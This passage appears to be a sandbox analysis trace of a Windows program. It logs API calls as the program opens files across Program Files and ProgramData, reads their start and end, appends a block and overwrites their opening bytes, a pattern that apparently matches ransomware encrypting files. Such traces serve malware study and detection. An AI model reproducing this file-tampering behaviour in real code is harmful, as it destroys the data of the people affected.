lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0156.752] LocalFree (hMem=0x69e2b0) returned 0x0 [0156.752] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0156.752] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0156.753] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0156.753] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0156.753] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui")) returned 0x20 [0156.754] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.754] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe", lpFilePart=0x2e9f690*="ImagingDevices.exe") returned 0x3e [0156.754] GetLastError () returned 0x5 [0156.755] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2e9f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="i˩폈H˩퐔H˩L˩가Ƿ\x01") returned 0x13 [0156.755] LocalFree (hMem=0x69e2b0) returned 0x0 [0156.755] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2e9d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0156.755] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2e9f894) [0156.755] RtlUnwind (TargetFrame=0x2e9f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0156.755] RtlUnwind (TargetFrame=0x2e9f920, TargetIp=0x407184, ExceptionRecord=0x2e9f378, ReturnValue=0x0) [0156.755] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\ImagingDevices.exe" (normalized: "c:\\program files (x86)\\windows photo viewer\\imagingdevices.exe")) returned 0x20 [0156.757] CreateFileW (lpFileName="C:\\ProgramData\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrSecUpd10111.msp" (normalized: "c:\\programdata\\adobe\\arm\\reader_10.0.0\\adberdrsecupd10111.msp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.758] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.758] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3d800 [0156.758] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.758] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.758] ReleaseMutex (hMutex=0x168) returned 1 [0156.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrSecUpd10111.msp", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0156.759] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdbeRdrSecUpd10111.msp", cchWideChar=22, lpMultiByteStr=0x1f88c44, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdbeRdrSecUpd10111.msp", lpUsedDefaultChar=0x0) returned 22 [0156.759] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0156.761] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3c800 [0156.761] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0156.762] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x3c800 [0156.762] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0156.762] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0156.763] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0156.763] CloseHandle (hObject=0x1d4) returned 1 [0156.763] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.INFOPATH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.infopath.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.800] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.800] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x158 [0158.801] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.801] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.801] ReleaseMutex (hMutex=0x168) returned 1 [0158.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0158.803] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1f88d34, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0158.803] ReadFile (in: hFile=0x1cc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x158, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x2e9f2bc*=0x158, lpOverlapped=0x0) returned 1 [0158.819] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0158.819] WriteFile (in: hFile=0x1cc, lpBuffer=0x2848458*, nNumberOfBytesToWrite=0x6e0, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2848458*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6e0, lpOverlapped=0x0) returned 1 [0158.827] CloseHandle (hObject=0x1cc) returned 1 [0158.827] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x13a [0158.840] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.841] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.841] ReleaseMutex (hMutex=0x168) returned 1 [0158.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0158.841] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.OIS.14.1033.hxn", cchWideChar=18, lpMultiByteStr=0x1f88bcc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.OIS.14.1033.hxn", lpUsedDefaultChar=0x0) returned 18 [0158.841] ReadFile (in: hFile=0x1cc, lpBuffer=0x288ab48, nNumberOfBytesToRead=0x13a, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ab48*, lpNumberOfBytesRead=0x2e9f2bc*=0x13a, lpOverlapped=0x0) returned 1 [0158.842] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0158.842] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x6c2, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6c2, lpOverlapped=0x0) returned 1 [0158.843] CloseHandle (hObject=0x1cc) returned 1 [0158.843] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.VISIO.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.visio.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.844] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.844] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x15e [0158.844] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.844] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.844] ReleaseMutex (hMutex=0x168) returned 1 [0158.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0158.844] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0158.844] ReadFile (in: hFile=0x1cc, lpBuffer=0x26a8c68, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26a8c68*, lpNumberOfBytesRead=0x2e9f2bc*=0x15e, lpOverlapped=0x0) returned 1 [0158.845] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0158.845] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956c8*, nNumberOfBytesToWrite=0x6e6, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x28956c8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x6e6, lpOverlapped=0x0) returned 1 [0158.845] CloseHandle (hObject=0x1cc) returned 1 [0158.846] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\nslist.hxl" (normalized: "c:\\programdata\\microsoft help\\nslist.hxl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.846] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.846] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x21dc [0158.846] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.847] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.847] ReleaseMutex (hMutex=0x168) returned 1 [0158.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0158.847] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nslist.hxl", cchWideChar=10, lpMultiByteStr=0x1f732cc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nslist.hxl", lpUsedDefaultChar=0x0) returned 10 [0158.847] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.849] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11dc [0158.849] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x11dc [0158.850] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.850] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0158.850] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0158.850] CloseHandle (hObject=0x1cc) returned 1 [0158.850] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\vc_runtimeAdditional_x64.msi" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\vc_runtimeadditional_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.855] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.855] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x25000 [0158.855] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.855] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.855] ReleaseMutex (hMutex=0x168) returned 1 [0158.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0158.855] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeAdditional_x64.msi", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeAdditional_x64.msi", lpUsedDefaultChar=0x0) returned 28 [0158.856] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0158.857] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x24000 [0158.857] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.858] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x24000 [0158.858] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.859] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0158.859] WriteFile (in: hFile=0x1cc, lpBuffer=0x2839408*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0158.859] CloseHandle (hObject=0x1cc) returned 1 [0158.859] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\vcRuntimeMinimum_amd64\\vc_runtimeMinimum_x64.msi" (normalized: "c:\\programdata\\package cache\\{8d4f7a6d-6b81-3dc8-9c21-6008e4866727}v14.10.25017\\packages\\vcruntimeminimum_amd64\\vc_runtimeminimum_x64.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.860] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.861] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x24000 [0158.861] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.861] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.861] ReleaseMutex (hMutex=0x168) returned 1 [0158.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0158.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x64.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x64.msi", lpUsedDefaultChar=0x0) returned 25 [0158.861] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0158.863] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x23000 [0158.863] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0158.864] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x23000 [0158.864] WriteFile (in: hFile=0x1cc, lpBuffer=0x28956a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0158.865] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0158.865] WriteFile (in: hFile=0x1cc, lpBuffer=0x2839408*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2839408*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0158.865] CloseHandle (hObject=0x1cc) returned 1 [0158.866] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}v11.0.61030\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi" (normalized: "c:\\programdata\\package cache\\{bd95a8cd-1d9f-35ad-981a-3e7925026ebb}v11.0.61030\\packages\\vcruntimeminimum_x86\\vc_runtimeminimum_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0158.867] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.867] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x25000 [0158.867] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0158.867] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0158.867] ReleaseMutex (hMutex=0x168) returned 1 [0158.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0158.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vc_runtimeMinimum_x86.msi", cchWideChar=25, lpMultiByteStr=0x1f8fc6c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vc_runtimeMinimum_x86.msi", lpUsedDefaultChar=0x0) returned 25 [0158.868] ReadFile (in: hFile=0x1cc, lpBuffer=0x28956a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28956a8*, 